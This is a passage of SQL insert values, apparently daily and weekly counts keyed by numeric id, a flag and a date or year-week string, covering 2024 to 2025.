(650,0,'20250916',1),
(784,0,'20250916',1),
(810,0,'20250916',1),
(840,0,'20250916',1),
(871,0,'20250916',1),
(1032,0,'20250916',1),
(1502,0,'20250916',1),
(1558,0,'20250916',1),
(1571,0,'20250916',1),
(1915,0,'20250916',1),
(362,0,'20250916',2),
(776,0,'20250916',2),
(1003,0,'20250916',2),
(605,0,'20250916',3),
(656,0,'20250916',3),
(780,0,'20250916',3),
(1016,0,'20250916',3),
(355,0,'20250916',4),
(469,0,'20250916',4),
(14,0,'20250916',16),
(566,0,'20250917',1),
(643,0,'20250917',1),
(703,0,'20250917',1),
(855,0,'20250917',1),
(859,0,'20250917',1),
(1016,0,'20250917',1),
(1032,0,'20250917',1),
(1036,0,'20250917',1),
(1052,0,'20250917',1),
(1059,0,'20250917',1),
(1623,0,'20250917',1),
(1915,0,'20250917',1),
(355,0,'20250917',2),
(362,0,'20250917',2),
(476,0,'20250917',2),
(506,0,'20250917',2),
(609,0,'20250917',2),
(656,0,'20250917',2),
(680,0,'20250917',2),
(716,0,'20250917',2),
(771,0,'20250917',2),
(784,0,'20250917',2),
(828,0,'20250917',2),
(836,0,'20250917',2),
(840,0,'20250917',2),
(1010,0,'20250917',2),
(484,0,'20250917',3),
(831,0,'20250917',3),
(469,0,'20250917',4),
(14,0,'20250917',24),
(362,0,'20250918',1),
(484,0,'20250918',1),
(542,0,'20250918',1),
(546,0,'20250918',1),
(609,0,'20250918',1),
(680,0,'20250918',1),
(831,0,'20250918',1),
(851,0,'20250918',1),
(859,0,'20250918',1),
(1003,0,'20250918',1),
(1010,0,'20250918',1),
(1020,0,'20250918',1),
(1032,0,'20250918',1),
(1697,0,'20250918',1),
(355,0,'20250918',2),
(459,0,'20250918',2),
(469,0,'20250918',2),
(650,0,'20250918',2),
(703,0,'20250918',2),
(716,0,'20250918',2),
(741,0,'20250918',2),
(748,0,'20250918',2),
(771,0,'20250918',2),
(776,0,'20250918',2),
(784,0,'20250918',2),
(824,0,'20250918',2),
(855,0,'20250918',2),
(1059,0,'20250918',2),
(1502,0,'20250918',2),
(1558,0,'20250918',2),
(1915,0,'20250918',2),
(496,0,'20250918',3),
(506,0,'20250918',3),
(643,0,'20250918',3),
(708,0,'20250918',3),
(810,0,'20250918',3),
(828,0,'20250918',3),
(900,0,'20250918',3),
(1052,0,'20250918',3),
(605,0,'20250918',4),
(700,0,'20250918',4),
(871,0,'20250918',5),
(14,0,'20250918',27),
(469,0,'20250919',1),
(476,0,'20250919',1),
(484,0,'20250919',1),
(566,0,'20250919',1),
(650,0,'20250919',1),
(656,0,'20250919',1),
(708,0,'20250919',1),
(716,0,'20250919',1),
(824,0,'20250919',1),
(828,0,'20250919',1),
(831,0,'20250919',1),
(840,0,'20250919',1),
(851,0,'20250919',1),
(855,0,'20250919',1),
(871,0,'20250919',1),
(1003,0,'20250919',1),
(1052,0,'20250919',1),
(1684,0,'20250919',1),
(1704,0,'20250919',1),
(1754,0,'20250919',1),
(355,0,'20250919',2),
(459,0,'20250919',2),
(563,0,'20250919',2),
(712,0,'20250919',2),
(748,0,'20250919',2),
(1059,0,'20250919',2),
(546,0,'20250919',3),
(859,0,'20250919',3),
(14,0,'20250919',28),
(542,0,'20250920',1),
(680,0,'20250920',1),
(703,0,'20250920',1),
(776,0,'20250920',1),
(824,0,'20250920',1),
(851,0,'20250920',1),
(1003,0,'20250920',1),
(1502,0,'20250920',1),
(1540,0,'20250920',1),
(1558,0,'20250920',1),
(1704,0,'20250920',1),
(1754,0,'20250920',1),
(355,0,'20250920',2),
(459,0,'20250920',2),
(469,0,'20250920',2),
(476,0,'20250920',2),
(496,0,'20250920',2),
(546,0,'20250920',2),
(605,0,'20250920',2),
(609,0,'20250920',2),
(643,0,'20250920',2),
(650,0,'20250920',2),
(656,0,'20250920',2),
(741,0,'20250920',2),
(748,0,'20250920',2),
(780,0,'20250920',2),
(784,0,'20250920',2),
(859,0,'20250920',2),
(900,0,'20250920',2),
(1032,0,'20250920',2),
(1523,0,'20250920',2),
(1571,0,'20250920',2),
(1611,0,'20250920',2),
(1684,0,'20250920',2),
(1697,0,'20250920',2),
(563,0,'20250920',3),
(566,0,'20250920',3),
(712,0,'20250920',3),
(810,0,'20250920',3),
(871,0,'20250920',3),
(1594,0,'20250920',3),
(362,0,'20250920',4),
(1623,0,'20250920',4),
(14,0,'20250920',21),
(362,0,'20250921',1),
(459,0,'20250921',1),
(476,0,'20250921',1),
(563,0,'20250921',1),
(605,0,'20250921',1),
(609,0,'20250921',1),
(708,0,'20250921',1),
(741,0,'20250921',1),
(771,0,'20250921',1),
(780,0,'20250921',1),
(784,0,'20250921',1),
(810,0,'20250921',1),
(824,0,'20250921',1),
(855,0,'20250921',1),
(1036,0,'20250921',1),
(1523,0,'20250921',1),
(1571,0,'20250921',1),
(1594,0,'20250921',1),
(1915,0,'20250921',1),
(355,0,'20250921',2),
(1052,0,'20250921',2),
(14,0,'20250921',17),
(355,0,'20250922',1),
(469,0,'20250922',1),
(484,0,'20250922',1),
(563,0,'20250922',1),
(700,0,'20250922',1),
(708,0,'20250922',1),
(741,0,'20250922',1),
(748,0,'20250922',1),
(828,0,'20250922',1),
(836,0,'20250922',1),
(871,0,'20250922',1),
(900,0,'20250922',1),
(1558,0,'20250922',1),
(1684,0,'20250922',1),
(1915,0,'20250922',1),
(14,0,'20250922',26),
(355,0,'20250923',1),
(476,0,'20250923',1),
(703,0,'20250923',1),
(716,0,'20250923',1),
(748,0,'20250923',1),
(1020,0,'20250923',1),
(1059,0,'20250923',1),
(1523,0,'20250923',1),
(1558,0,'20250923',1),
(1915,0,'20250923',1),
(643,0,'20250923',2),
(1032,0,'20250923',2),
(1502,0,'20250923',2),
(1540,0,'20250923',2),
(14,0,'20250923',25),
(605,0,'20250924',1),
(609,0,'20250924',1),
(810,0,'20250924',1),
(1032,0,'20250924',1),
(1523,0,'20250924',1),
(1684,0,'20250924',1),
(355,0,'20250924',3),
(14,0,'20250924',17),
(66,1,'202432',1),
(95,1,'202432',1),
(362,1,'202432',1),
(459,1,'202432',1),
(469,1,'202432',1),
(476,1,'202432',1),
(484,1,'202432',1),
(496,1,'202432',1),
(506,1,'202432',1),
(542,1,'202432',1),
(546,1,'202432',1),
(563,1,'202432',1),
(566,1,'202432',1),
(605,1,'202432',1),
(609,1,'202432',1),
(643,1,'202432',1),
(656,1,'202432',1),
(680,1,'202432',1),
(703,1,'202432',1),
(712,1,'202432',1),
(716,1,'202432',1),
(748,1,'202432',1),
(771,1,'202432',1),
(776,1,'202432',1),
(780,1,'202432',1),
(650,1,'202432',2),
(708,1,'202432',2),
(741,1,'202432',2),
(700,1,'202432',3),
(784,1,'202432',3),
(355,1,'202432',4),
(14,1,'202432',32),
(459,1,'202433',1),
(476,1,'202433',1),
(506,1,'202433',1),
(563,1,'202433',1),
(605,1,'202433',1),
(609,1,'202433',1),
(656,1,'202433',1),
(680,1,'202433',1),
(716,1,'202433',1),
(741,1,'202433',1),
(748,1,'202433',1),
(771,1,'202433',1),
(810,1,'202433',1),
(824,1,'202433',1),
(362,1,'202433',2),
(469,1,'202433',2),
(643,1,'202433',2),
(700,1,'202433',2),
(712,1,'202433',2),
(776,1,'202433',2),
(780,1,'202433',2),
(784,1,'202433',2),
(828,1,'202433',2),
(836,1,'202433',2),
(851,1,'202433',2),
(855,1,'202433',2),
(484,1,'202433',3),
(708,1,'202433',3),
(840,1,'202433',3),
(859,1,'202433',3),
(703,1,'202433',4),
(831,1,'202433',4),
(355,1,'202433',19),
(14,1,'202433',48),
(784,1,'202434',1),
(824,1,'202434',1),
(484,1,'202434',2),
(605,1,'202434',2),
(716,1,'202434',2),
(748,1,'202434',2),
(828,1,'202434',2),
(831,1,'202434',2),
(836,1,'202434',2),
(840,1,'202434',2),
(851,1,'202434',2),
(859,1,'202434',2),
(1036,1,'202434',2),
(1052,1,'202434',2),
(459,1,'202434',3),
(469,1,'202434',3),
(476,1,'202434',3),
(563,1,'202434',3),
(566,1,'202434',3),
(656,1,'202434',3),
(680,1,'202434',3),
(700,1,'202434',3),
(703,1,'202434',3),
(708,1,'202434',3),
(771,1,'202434',3),
(776,1,'202434',3),
(780,1,'202434',3),
(810,1,'202434',3),
(855,1,'202434',3),
(900,1,'202434',3),
(1003,1,'202434',3),
(1010,1,'202434',3),
(1016,1,'202434',3),
(1032,1,'202434',3),
(1059,1,'202434',3),
(362,1,'202434',4),
(496,1,'202434',4),
(506,1,'202434',4),
(546,1,'202434',4),
(609,1,'202434',4),
(643,1,'202434',4),
(712,1,'202434',4),
(1020,1,'202434',4),
(542,1,'202434',5),
(741,1,'202434',5),
(650,1,'202434',6),
(871,1,'202434',8),
(355,1,'202434',21),
(14,1,'202434',87),
(484,1,'202435',1),
(496,1,'202435',1),
(563,1,'202435',1),
(609,1,'202435',1),
(656,1,'202435',1),
(708,1,'202435',1),
(712,1,'202435',1),
(741,1,'202435',1),
(680,1,'202435',2),
(703,1,'202435',2),
(900,1,'202435',2),
(1010,1,'202435',2),
(1016,1,'202435',2),
(1020,1,'202435',2),
(1059,1,'202435',2),
(476,1,'202435',3),
(542,1,'202435',3),
(566,1,'202435',3),
(643,1,'202435',3),
(700,1,'202435',3),
(748,1,'202435',3),
(776,1,'202435',3),
(810,1,'202435',3),
(831,1,'202435',3),
(1032,1,'202435',3),
(459,1,'202435',4),
(506,1,'202435',4),
(546,1,'202435',4),
(771,1,'202435',4),
(784,1,'202435',4),
(828,1,'202435',4),
(836,1,'202435',4),
(859,1,'202435',4),
(871,1,'202435',4),
(1003,1,'202435',4),
(355,1,'202435',5),
(605,1,'202435',5),
(716,1,'202435',5),
(780,1,'202435',5),
(840,1,'202435',5),
(851,1,'202435',5),
(855,1,'202435',5),
(1036,1,'202435',5),
(1052,1,'202435',5),
(469,1,'202435',6),
(824,1,'202435',6),
(650,1,'202435',7),
(362,1,'202435',10),
(14,1,'202435',84),
(362,1,'202436',1),
(496,1,'202436',1),
(810,1,'202436',1),
(1105,1,'202436',1),
(484,1,'202436',2),
(542,1,'202436',2),
(563,1,'202436',2),
(609,1,'202436',2),
(643,1,'202436',2),
(650,1,'202436',2),
(656,1,'202436',2),
(700,1,'202436',2),
(748,1,'202436',2),
(771,1,'202436',2),
(784,1,'202436',2),
(840,1,'202436',2),
(355,1,'202436',3),
(459,1,'202436',3),
(469,1,'202436',3),
(476,1,'202436',3),
(546,1,'202436',3),
(703,1,'202436',3),
(708,1,'202436',3),
(712,1,'202436',3),
(716,1,'202436',3),
(741,1,'202436',3),
(776,1,'202436',3),
(824,1,'202436',3),
(828,1,'202436',3),
(831,1,'202436',3),
(836,1,'202436',3),
(851,1,'202436',3),
(855,1,'202436',3),
(871,1,'202436',3),
(1016,1,'202436',3),
(1020,1,'202436',3),
(1032,1,'202436',3),
(1036,1,'202436',3),
(506,1,'202436',4),
(566,1,'202436',4),
(605,1,'202436',4),
(680,1,'202436',4),
(780,1,'202436',4),
(1010,1,'202436',4),
(1059,1,'202436',4),
(900,1,'202436',5),
(1003,1,'202436',5),
(1052,1,'202436',5),
(859,1,'202436',6),
(14,1,'202436',47),
(459,1,'202437',1),
(469,1,'202437',1),
(506,1,'202437',1),
(563,1,'202437',1),
(566,1,'202437',1),
(609,1,'202437',1),
(643,1,'202437',1),
(656,1,'202437',1),
(700,1,'202437',1),
(708,1,'202437',1),
(712,1,'202437',1),
(741,1,'202437',1),
(748,1,'202437',1),
(776,1,'202437',1),
(828,1,'202437',1),
(831,1,'202437',1),
(859,1,'202437',1),
(1020,1,'202437',1),
(1032,1,'202437',1),
(1059,1,'202437',1),
(355,1,'202437',2),
(542,1,'202437',2),
(546,1,'202437',2),
(605,1,'202437',2),
(650,1,'202437',2),
(771,1,'202437',2),
(810,1,'202437',2),
(1052,1,'202437',2),
(362,1,'202437',3),
(840,1,'202437',3),
(871,1,'202437',3),
(1036,1,'202437',3),
(824,1,'202437',4),
(784,1,'202437',5),
(780,1,'202437',6),
(703,1,'202437',7),
(14,1,'202437',53),
(542,1,'202438',1),
(546,1,'202438',1),
(703,1,'202438',1),
(712,1,'202438',1),
(741,1,'202438',1),
(362,1,'202438',2),
(459,1,'202438',2),
(484,1,'202438',2),
(563,1,'202438',2),
(566,1,'202438',2),
(609,1,'202438',2),
(643,1,'202438',2),
(650,1,'202438',2),
(656,1,'202438',2),
(700,1,'202438',2),
(708,1,'202438',2),
(716,1,'202438',2),
(771,1,'202438',2),
(776,1,'202438',2),
(780,1,'202438',2),
(784,1,'202438',2),
(810,1,'202438',2),
(851,1,'202438',2),
(859,1,'202438',2),
(871,1,'202438',2),
(1016,1,'202438',2),
(1032,1,'202438',2),
(355,1,'202438',3),
(469,1,'202438',3),
(476,1,'202438',3),
(496,1,'202438',3),
(605,1,'202438',3),
(680,1,'202438',3),
(748,1,'202438',3),
(828,1,'202438',3),
(831,1,'202438',3),
(836,1,'202438',3),
(855,1,'202438',3),
(1003,1,'202438',3),
(1010,1,'202438',3),
(1020,1,'202438',3),
(1036,1,'202438',3),
(1059,1,'202438',3),
(506,1,'202438',4),
(824,1,'202438',4),
(900,1,'202438',4),
(1052,1,'202438',4),
(840,1,'202438',6),
(14,1,'202438',45),
(484,1,'202439',2),
(496,1,'202439',2),
(542,1,'202439',2),
(563,1,'202439',2),
(650,1,'202439',2),
(656,1,'202439',2),
(680,1,'202439',2),
(716,1,'202439',2),
(748,1,'202439',2),
(810,1,'202439',2),
(824,1,'202439',2),
(871,1,'202439',2),
(900,1,'202439',2),
(1003,1,'202439',2),
(1010,1,'202439',2),
(1016,1,'202439',2),
(1020,1,'202439',2),
(1032,1,'202439',2),
(1036,1,'202439',2),
(1052,1,'202439',2),
(1059,1,'202439',2),
(362,1,'202439',3),
(459,1,'202439',3),
(476,1,'202439',3),
(506,1,'202439',3),
(546,1,'202439',3),
(566,1,'202439',3),
(609,1,'202439',3),
(643,1,'202439',3),
(700,1,'202439',3),
(703,1,'202439',3),
(708,1,'202439',3),
(712,1,'202439',3),
(741,1,'202439',3),
(771,1,'202439',3),
(776,1,'202439',3),
(780,1,'202439',3),
(784,1,'202439',3),
(828,1,'202439',3),
(831,1,'202439',3),
(836,1,'202439',3),
(851,1,'202439',3),
(855,1,'202439',3),
(859,1,'202439',3),
(469,1,'202439',4),
(605,1,'202439',4),
(840,1,'202439',16),
(355,1,'202439',25),
(14,1,'202439',81),
(459,1,'202440',2),
(476,1,'202440',2),
(484,1,'202440',2),
(563,1,'202440',2),
(703,1,'202440',2),
(741,1,'202440',2),
(771,1,'202440',2),
(780,1,'202440',2),
(784,1,'202440',2),
(469,1,'202440',3),
(546,1,'202440',3),
(650,1,'202440',3),
(824,1,'202440',3),
(836,1,'202440',3),
(855,1,'202440',3),
(859,1,'202440',3),
(1052,1,'202440',3),
(1059,1,'202440',3),
(362,1,'202440',4),
(506,1,'202440',4),
(542,1,'202440',4),
(656,1,'202440',4),
(700,1,'202440',4),
(708,1,'202440',4),
(712,1,'202440',4),
(748,1,'202440',4),
(776,1,'202440',4),
(810,1,'202440',4),
(828,1,'202440',4),
(831,1,'202440',4),
(871,1,'202440',4),
(1010,1,'202440',4),
(1016,1,'202440',4),
(496,1,'202440',5),
(609,1,'202440',5),
(643,1,'202440',5),
(1032,1,'202440',5),
(1036,1,'202440',5),
(355,1,'202440',6),
(605,1,'202440',6),
(680,1,'202440',6),
(716,1,'202440',6),
(851,1,'202440',6),
(900,1,'202440',6),
(1020,1,'202440',6),
(566,1,'202440',7),
(1003,1,'202440',7),
(840,1,'202440',17),
(14,1,'202440',72),
(496,1,'202441',1),
(810,1,'202441',1),
(542,1,'202441',2),
(609,1,'202441',2),
(656,1,'202441',2),
(680,1,'202441',2),
(700,1,'202441',2),
(716,1,'202441',2),
(748,1,'202441',2),
(831,1,'202441',2),
(851,1,'202441',2),
(900,1,'202441',2),
(1003,1,'202441',2),
(1020,1,'202441',2),
(566,1,'202441',3),
(643,1,'202441',3),
(859,1,'202441',3),
(871,1,'202441',3),
(1032,1,'202441',3),
(1036,1,'202441',3),
(362,1,'202441',4),
(546,1,'202441',4),
(563,1,'202441',4),
(605,1,'202441',4),
(708,1,'202441',4),
(712,1,'202441',4),
(741,1,'202441',4),
(776,1,'202441',4),
(824,1,'202441',4),
(828,1,'202441',4),
(836,1,'202441',4),
(855,1,'202441',4),
(1010,1,'202441',4),
(1016,1,'202441',4),
(1052,1,'202441',4),
(459,1,'202441',5),
(469,1,'202441',5),
(703,1,'202441',5),
(771,1,'202441',5),
(780,1,'202441',5),
(784,1,'202441',5),
(1059,1,'202441',5),
(476,1,'202441',7),
(506,1,'202441',8),
(650,1,'202441',8),
(484,1,'202441',10),
(840,1,'202441',12),
(355,1,'202441',64),
(14,1,'202441',11204),
(459,1,'202442',2),
(476,1,'202442',2),
(484,1,'202442',2),
(506,1,'202442',2),
(542,1,'202442',2),
(563,1,'202442',2),
(566,1,'202442',2),
(708,1,'202442',2),
(712,1,'202442',2),
(716,1,'202442',2),
(748,1,'202442',2),
(771,1,'202442',2),
(776,1,'202442',2),
(784,1,'202442',2),
(1032,1,'202442',2),
(546,1,'202442',3),
(656,1,'202442',3),
(680,1,'202442',3),
(700,1,'202442',3),
(703,1,'202442',3),
(741,1,'202442',3),
(780,1,'202442',3),
(810,1,'202442',3),
(824,1,'202442',3),
(831,1,'202442',3),
(836,1,'202442',3),
(851,1,'202442',3),
(855,1,'202442',3),
(859,1,'202442',3),
(1010,1,'202442',3),
(1016,1,'202442',3),
(1020,1,'202442',3),
(1036,1,'202442',3),
(1052,1,'202442',3),
(1059,1,'202442',3),
(496,1,'202442',4),
(650,1,'202442',4),
(1003,1,'202442',4),
(362,1,'202442',5),
(469,1,'202442',5),
(609,1,'202442',5),
(643,1,'202442',5),
(828,1,'202442',5),
(900,1,'202442',5),
(871,1,'202442',6),
(605,1,'202442',9),
(840,1,'202442',17),
(355,1,'202442',35),
(14,1,'202442',312),
(484,1,'202443',1),
(542,1,'202443',1),
(563,1,'202443',1),
(656,1,'202443',1),
(700,1,'202443',1),
(716,1,'202443',1),
(741,1,'202443',1),
(748,1,'202443',1),
(900,1,'202443',1),
(1032,1,'202443',1),
(650,1,'202443',2),
(680,1,'202443',2),
(824,1,'202443',2),
(831,1,'202443',2),
(851,1,'202443',2),
(855,1,'202443',2),
(859,1,'202443',2),
(1003,1,'202443',2),
(1010,1,'202443',2),
(1016,1,'202443',2),
(1020,1,'202443',2),
(1036,1,'202443',2),
(1052,1,'202443',2),
(1059,1,'202443',2),
(459,1,'202443',3),
(469,1,'202443',3),
(476,1,'202443',3),
(506,1,'202443',3),
(546,1,'202443',3),
(566,1,'202443',3),
(703,1,'202443',3),
(708,1,'202443',3),
(712,1,'202443',3),
(771,1,'202443',3),
(776,1,'202443',3),
(780,1,'202443',3),
(784,1,'202443',3),
(871,1,'202443',3),
(605,1,'202443',4),
(609,1,'202443',4),
(643,1,'202443',4),
(362,1,'202443',5),
(840,1,'202443',5),
(355,1,'202443',10),
(14,1,'202443',42),
(362,1,'202444',1),
(605,1,'202444',1),
(609,1,'202444',1),
(871,1,'202444',1),
(542,1,'202444',2),
(563,1,'202444',2),
(643,1,'202444',2),
(656,1,'202444',2),
(700,1,'202444',2),
(716,1,'202444',2),
(741,1,'202444',2),
(748,1,'202444',2),
(810,1,'202444',2),
(836,1,'202444',2),
(900,1,'202444',2),
(1032,1,'202444',2),
(484,1,'202444',3),
(496,1,'202444',3),
(566,1,'202444',3),
(708,1,'202444',3),
(859,1,'202444',3),
(1059,1,'202444',3),
(459,1,'202444',4),
(546,1,'202444',4),
(703,1,'202444',4),
(712,1,'202444',4),
(771,1,'202444',4),
(776,1,'202444',4),
(780,1,'202444',4),
(784,1,'202444',4),
(824,1,'202444',4),
(828,1,'202444',4),
(831,1,'202444',4),
(840,1,'202444',4),
(851,1,'202444',4),
(1003,1,'202444',4),
(1010,1,'202444',4),
(1016,1,'202444',4),
(1020,1,'202444',4),
(1036,1,'202444',4),
(1052,1,'202444',4),
(506,1,'202444',5),
(650,1,'202444',5),
(680,1,'202444',5),
(855,1,'202444',5),
(469,1,'202444',7),
(476,1,'202444',9),
(355,1,'202444',18),
(14,1,'202444',158),
(459,1,'202445',1),
(496,1,'202445',1),
(542,1,'202445',1),
(563,1,'202445',1),
(566,1,'202445',1),
(650,1,'202445',1),
(656,1,'202445',1),
(680,1,'202445',1),
(700,1,'202445',1),
(703,1,'202445',1),
(708,1,'202445',1),
(712,1,'202445',1),
(716,1,'202445',1),
(741,1,'202445',1),
(748,1,'202445',1),
(771,1,'202445',1),
(776,1,'202445',1),
(780,1,'202445',1),
(784,1,'202445',1),
(810,1,'202445',1),
(824,1,'202445',1),
(831,1,'202445',1),
(840,1,'202445',1),
(851,1,'202445',1),
(855,1,'202445',1),
(859,1,'202445',1),
(469,1,'202445',2),
(476,1,'202445',2),
(484,1,'202445',2),
(546,1,'202445',2),
(605,1,'202445',2),
(609,1,'202445',2),
(871,1,'202445',2),
(1003,1,'202445',2),
(1010,1,'202445',2),
(1016,1,'202445',2),
(1020,1,'202445',2),
(1036,1,'202445',2),
(1052,1,'202445',2),
(1059,1,'202445',2),
(362,1,'202445',3),
(643,1,'202445',3),
(506,1,'202445',4),
(355,1,'202445',5),
(14,1,'202445',42),
(484,1,'202446',1),
(506,1,'202446',1),
(609,1,'202446',1),
(656,1,'202446',1),
(700,1,'202446',1),
(703,1,'202446',1),
(741,1,'202446',1),
(780,1,'202446',1),
(810,1,'202446',1),
(828,1,'202446',1),
(836,1,'202446',1),
(840,1,'202446',1),
(851,1,'202446',1),
(859,1,'202446',1),
(900,1,'202446',1),
(355,1,'202446',2),
(496,1,'202446',2),
(643,1,'202446',2),
(771,1,'202446',2),
(824,1,'202446',2),
(650,1,'202446',4),
(14,1,'202446',42),
(476,1,'202447',1),
(484,1,'202447',1),
(563,1,'202447',1),
(700,1,'202447',1),
(716,1,'202447',1),
(741,1,'202447',1),
(748,1,'202447',1),
(824,1,'202447',1),
(836,1,'202447',1),
(851,1,'202447',1),
(855,1,'202447',1),
(900,1,'202447',1),
(1003,1,'202447',1),
(1010,1,'202447',1),
(1016,1,'202447',1),
(1020,1,'202447',1),
(1036,1,'202447',1),
(1052,1,'202447',1),
(1059,1,'202447',1),
(459,1,'202447',2),
(496,1,'202447',2),
(542,1,'202447',2),
(566,1,'202447',2),
(643,1,'202447',2),
(650,1,'202447',2),
(656,1,'202447',2),
(680,1,'202447',2),
(703,1,'202447',2),
(708,1,'202447',2),
(712,1,'202447',2),
(771,1,'202447',2),
(784,1,'202447',2),
(828,1,'202447',2),
(831,1,'202447',2),
(840,1,'202447',2),
(859,1,'202447',2),
(1032,1,'202447',2),
(362,1,'202447',3),
(469,1,'202447',3),
(546,1,'202447',3),
(605,1,'202447',3),
(609,1,'202447',3),
(776,1,'202447',3),
(780,1,'202447',3),
(506,1,'202447',5),
(355,1,'202447',7),
(14,1,'202447',43),
(362,1,'202448',1),
(459,1,'202448',1),
(484,1,'202448',1),
(563,1,'202448',1),
(566,1,'202448',1),
(605,1,'202448',1),
(700,1,'202448',1),
(703,1,'202448',1),
(708,1,'202448',1),
(716,1,'202448',1),
(741,1,'202448',1),
(748,1,'202448',1),
(784,1,'202448',1),
(810,1,'202448',1),
(828,1,'202448',1),
(871,1,'202448',1),
(900,1,'202448',1),
(1010,1,'202448',1),
(1016,1,'202448',1),
(1036,1,'202448',1),
(476,1,'202448',2),
(780,1,'202448',2),
(831,1,'202448',2),
(840,1,'202448',2),
(1003,1,'202448',2),
(355,1,'202448',3),
(496,1,'202448',3),
(506,1,'202448',3),
(650,1,'202448',3),
(855,1,'202448',3),
(542,1,'202448',4),
(469,1,'202448',5),
(656,1,'202448',5),
(14,1,'202448',46),
(700,1,'202449',1),
(716,1,'202449',1),
(748,1,'202449',1),
(780,1,'202449',1),
(810,1,'202449',1),
(828,1,'202449',1),
(855,1,'202449',1),
(1010,1,'202449',1),
(1016,1,'202449',1),
(1020,1,'202449',1),
(1052,1,'202449',1),
(1059,1,'202449',1),
(469,1,'202449',2),
(476,1,'202449',2),
(484,1,'202449',2),
(542,1,'202449',2),
(563,1,'202449',2),
(656,1,'202449',2),
(741,1,'202449',2),
(831,1,'202449',2),
(871,1,'202449',2),
(1003,1,'202449',2),
(1036,1,'202449',2),
(362,1,'202449',3),
(496,1,'202449',3),
(605,1,'202449',3),
(609,1,'202449',3),
(643,1,'202449',3),
(650,1,'202449',4),
(355,1,'202449',6),
(506,1,'202449',8),
(14,1,'202449',62),
(459,1,'202450',1),
(484,1,'202450',1),
(542,1,'202450',1),
(546,1,'202450',1),
(563,1,'202450',1),
(566,1,'202450',1),
(609,1,'202450',1),
(643,1,'202450',1),
(680,1,'202450',1),
(700,1,'202450',1),
(703,1,'202450',1),
(708,1,'202450',1),
(716,1,'202450',1),
(748,1,'202450',1),
(771,1,'202450',1),
(776,1,'202450',1),
(784,1,'202450',1),
(828,1,'202450',1),
(1010,1,'202450',1),
(1016,1,'202450',1),
(1020,1,'202450',1),
(1052,1,'202450',1),
(1059,1,'202450',1),
(362,1,'202450',2),
(476,1,'202450',2),
(605,1,'202450',2),
(650,1,'202450',2),
(656,1,'202450',2),
(712,1,'202450',2),
(741,1,'202450',2),
(780,1,'202450',2),
(810,1,'202450',2),
(824,1,'202450',2),
(831,1,'202450',2),
(836,1,'202450',2),
(851,1,'202450',2),
(855,1,'202450',2),
(859,1,'202450',2),
(871,1,'202450',2),
(900,1,'202450',2),
(1003,1,'202450',2),
(1032,1,'202450',2),
(1036,1,'202450',2),
(496,1,'202450',3),
(840,1,'202450',3),
(469,1,'202450',4),
(506,1,'202450',4),
(355,1,'202450',11),
(14,1,'202450',66),
(476,1,'202451',1),
(542,1,'202451',1),
(546,1,'202451',1),
(605,1,'202451',1),
(650,1,'202451',1),
(656,1,'202451',1),
(700,1,'202451',1),
(712,1,'202451',1),
(716,1,'202451',1),
(741,1,'202451',1),
(748,1,'202451',1),
(824,1,'202451',1),
(828,1,'202451',1),
(831,1,'202451',1),
(836,1,'202451',1),
(840,1,'202451',1),
(851,1,'202451',1),
(855,1,'202451',1),
(871,1,'202451',1),
(900,1,'202451',1),
(1003,1,'202451',1),
(1010,1,'202451',1),
(1016,1,'202451',1),
(1020,1,'202451',1),
(1032,1,'202451',1),
(1036,1,'202451',1),
(1052,1,'202451',1),
(459,1,'202451',2),
(496,1,'202451',2),
(563,1,'202451',2),
(566,1,'202451',2),
(609,1,'202451',2),
(643,1,'202451',2),
(680,1,'202451',2),
(703,1,'202451',2),
(708,1,'202451',2),
(771,1,'202451',2),
(776,1,'202451',2),
(780,1,'202451',2),
(784,1,'202451',2),
(859,1,'202451',2),
(1059,1,'202451',3),
(469,1,'202451',4),
(506,1,'202451',5),
(355,1,'202451',11),
(14,1,'202451',56),
(542,1,'202452',2),
(563,1,'202452',2),
(605,1,'202452',2),
(650,1,'202452',2),
(716,1,'202452',2),
(741,1,'202452',2),
(784,1,'202452',2),
(859,1,'202452',2),
(469,1,'202452',3),
(780,1,'202452',3),
(828,1,'202452',3),
(1032,1,'202452',3),
(1052,1,'202452',3),
(459,1,'202452',4),
(484,1,'202452',4),
(496,1,'202452',4),
(546,1,'202452',4),
(566,1,'202452',4),
(609,1,'202452',4),
(656,1,'202452',4),
(680,1,'202452',4),
(700,1,'202452',4),
(703,1,'202452',4),
(708,1,'202452',4),
(712,1,'202452',4),
(748,1,'202452',4),
(771,1,'202452',4),
(776,1,'202452',4),
(855,1,'202452',4),
(871,1,'202452',4),
(1020,1,'202452',4),
(1036,1,'202452',4),
(1059,1,'202452',4),
(362,1,'202452',5),
(476,1,'202452',5),
(506,1,'202452',5),
(643,1,'202452',5),
(810,1,'202452',5),
(824,1,'202452',5),
(831,1,'202452',5),
(836,1,'202452',5),
(840,1,'202452',5),
(851,1,'202452',5),
(900,1,'202452',5),
(1003,1,'202452',5),
(1010,1,'202452',5),
(1016,1,'202452',5),
(355,1,'202452',27),
(14,1,'202452',135),
(459,1,'202501',1),
(476,1,'202501',1),
(496,1,'202501',1),
(542,1,'202501',1),
(563,1,'202501',1),
(566,1,'202501',1),
(643,1,'202501',1),
(650,1,'202501',1),
(656,1,'202501',1),
(680,1,'202501',1),
(708,1,'202501',1),
(741,1,'202501',1),
(748,1,'202501',1),
(771,1,'202501',1),
(776,1,'202501',1),
(784,1,'202501',1),
(810,1,'202501',1),
(824,1,'202501',1),
(828,1,'202501',1),
(840,1,'202501',1),
(851,1,'202501',1),
(855,1,'202501',1),
(859,1,'202501',1),
(900,1,'202501',1),
(1003,1,'202501',1),
(1016,1,'202501',1),
(1032,1,'202501',1),
(1036,1,'202501',1),
(1052,1,'202501',1),
(1059,1,'202501',1),
(362,1,'202501',2),
(469,1,'202501',2),
(484,1,'202501',2),
(506,1,'202501',2),
(546,1,'202501',2),
(605,1,'202501',2),
(609,1,'202501',2),
(700,1,'202501',2),
(712,1,'202501',2),
(716,1,'202501',2),
(780,1,'202501',2),
(836,1,'202501',2),
(871,1,'202501',5),
(355,1,'202501',10),
(14,1,'202501',49),
(362,1,'202502',1),
(476,1,'202502',1),
(484,1,'202502',1),
(546,1,'202502',1),
(680,1,'202502',1),
(712,1,'202502',1),
(810,1,'202502',1),
(836,1,'202502',1),
(840,1,'202502',1),
(851,1,'202502',1),
(855,1,'202502',1),
(871,1,'202502',1),
(1003,1,'202502',1),
(1016,1,'202502',1),
(1052,1,'202502',1),
(459,1,'202502',2),
(496,1,'202502',2),
(506,1,'202502',2),
(542,1,'202502',2),
(563,1,'202502',2),
(566,1,'202502',2),
(609,1,'202502',2),
(643,1,'202502',2),
(656,1,'202502',2),
(700,1,'202502',2),
(708,1,'202502',2),
(716,1,'202502',2),
